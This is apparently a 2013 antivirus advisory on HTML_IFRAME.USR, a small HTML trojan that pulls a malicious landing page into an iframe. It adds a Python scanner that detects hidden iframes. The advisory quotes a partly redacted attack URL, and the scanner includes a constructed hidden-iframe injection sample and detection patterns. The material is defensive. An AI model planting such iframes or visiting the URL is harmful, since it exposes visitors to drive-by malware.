
HTML_IFRAME.USR

July 08, 2013
 Analysis by: Alvin Bacani

 ALIASES:

JS/Exploit-Blacole.b!heur (NAI)

 PLATFORM:

Windows 2000, Windows Server 2003, Windows XP (32-bit, 64-bit), Windows Vista (32-bit, 64-bit), Windows 7 (32-bit, 64-bit)

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel:

Downloaded from the Internet


This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  TECHNICAL DETAILS

File Size:

342 bytes

File Type:

HTML, HTM

Initial Samples Received Date:

01 Jul 2013

Payload:

Connects to URLs/IPs

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

NOTES:

This HTML file uses an IFRAME to load the following URL, which serves the Trojan TROJ_PIDIEF.USR:

  • http://{BLOCKED}otel.net/news/severe-table_directs.php?gpmcg=2v:33:2w:1n:1m&ekcoej=m&gmfsm=1j:1i:1g:1l:2v:33:32:1i:2v:1h&lwanwsb=1f:1d:1f:1d:1f:1d:1f
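The file described on this page is a small HTML document whose only job is to pull a remote landing page into an IFRAME. As an added example (not code from the Trend Micro page or its analyst), the Python scanner below flags that pattern in an HTML file: a frame that is one pixel or hidden by CSS, whose host is on a block list, or whose src is a .php URL carrying several colon-separated token lists of the shape seen in the URL above. The two HTML strings are constructed for illustration, and the host malicious.example.invalid is a placeholder, not the {BLOCKED} site.

```python
"""
Added example, not from the Trend Micro page or its author: a small scanner
that flags the kind of HTML file HTML_IFRAME.USR represents, a page whose
payload is a hidden IFRAME pointing at a remote landing page. The sample
HTML strings below are constructed for illustration; the hostname
malicious.example.invalid is a placeholder, not the {BLOCKED} site.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attrs is a list of (name, value); value is None for bare attributes
            self.iframes.append({name.lower(): (value or "") for name, value in attrs})


def _tiny(value):
    """True when a width/height attribute is 0 or 1 (a one-pixel frame)."""
    match = re.match(r"\s*(\d+)", value or "")
    return match is not None and int(match.group(1)) <= 1


def _hidden(style):
    """True when inline CSS hides the frame or pushes it off-screen."""
    compact = (style or "").replace(" ", "").lower()
    return any(token in compact for token in
               ("visibility:hidden", "display:none", "left:-", "top:-"))


# Colon-separated base-36-looking tokens, the shape of the query values in the
# landing-page URL quoted in the NOTES section (e.g. 2v:33:2w:1n:1m).
_TOKEN_LIST = re.compile(r"^[0-9a-z]+(?::[0-9a-z]+)+$")


def _opaque_landing_page(src):
    """True for a .php URL whose query carries two or more token lists."""
    url = urlsplit(src)
    if not url.path.lower().endswith(".php"):
        return False
    params = parse_qs(url.query)
    token_lists = sum(1 for values in params.values() if _TOKEN_LIST.match(values[0]))
    return token_lists >= 2


def suspicious_iframes(html, blocked_hosts=()):
    """Return [(src, [reasons])] for each iframe that looks like a drive-by redirector."""
    collector = IframeCollector()
    collector.feed(html)
    blocked = {h.lower() for h in blocked_hosts}
    findings = []
    for frame in collector.iframes:
        src = frame.get("src", "")
        reasons = []
        if _tiny(frame.get("width")) or _tiny(frame.get("height")):
            reasons.append("one-pixel frame")
        if _hidden(frame.get("style")):
            reasons.append("frame hidden by CSS")
        host = (urlsplit(src).hostname or "").lower()
        if host and host in blocked:
            reasons.append("src host is blocked")
        if _opaque_landing_page(src):
            reasons.append("opaque .php landing page")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed samples: a hidden injected frame versus a normal video embed.
INJECTED_HTML = (
    '<html><body><p>welcome</p>'
    '<iframe src="http://malicious.example.invalid/news/severe-table_directs.php'
    '?gpmcg=2v:33:2w:1n:1m&amp;ekcoej=m&amp;gmfsm=1j:1i:1g:1l:2v:33&amp;lwanwsb=1f:1d:1f"'
    ' width="1" height="1" style="visibility:hidden"></iframe>'
    '</body></html>'
)
BENIGN_HTML = (
    '<p>Talk recording:</p>'
    '<iframe src="https://video.example.invalid/embed/abc123" width="560" height="315"></iframe>'
)

if __name__ == "__main__":
    for src, reasons in suspicious_iframes(INJECTED_HTML, blocked_hosts=["malicious.example.invalid"]):
        print(src, "->", ", ".join(reasons))
```

The frame size and CSS checks are independent of the URL, so they still fire when the landing-page host rotates; the block-list check is where the URL from the NOTES section (with its real host) would be fed in once it has been added to a web filter.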

  SOLUTION

Minimum Scan Engine:

9.300

FIRST VSAPI PATTERN FILE:

10.128.09

FIRST VSAPI PATTERN DATE:

01 Jul 2013

VSAPI OPR PATTERN File:

10.129.00

VSAPI OPR PATTERN Date:

01 Jul 2013

Step 1

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must allow full scanning of their computers.

Step 2

Remove the malware/grayware file dropped/downloaded by HTML_IFRAME.USR (TROJ_PIDIEF.USR, loaded from the URL listed under NOTES above).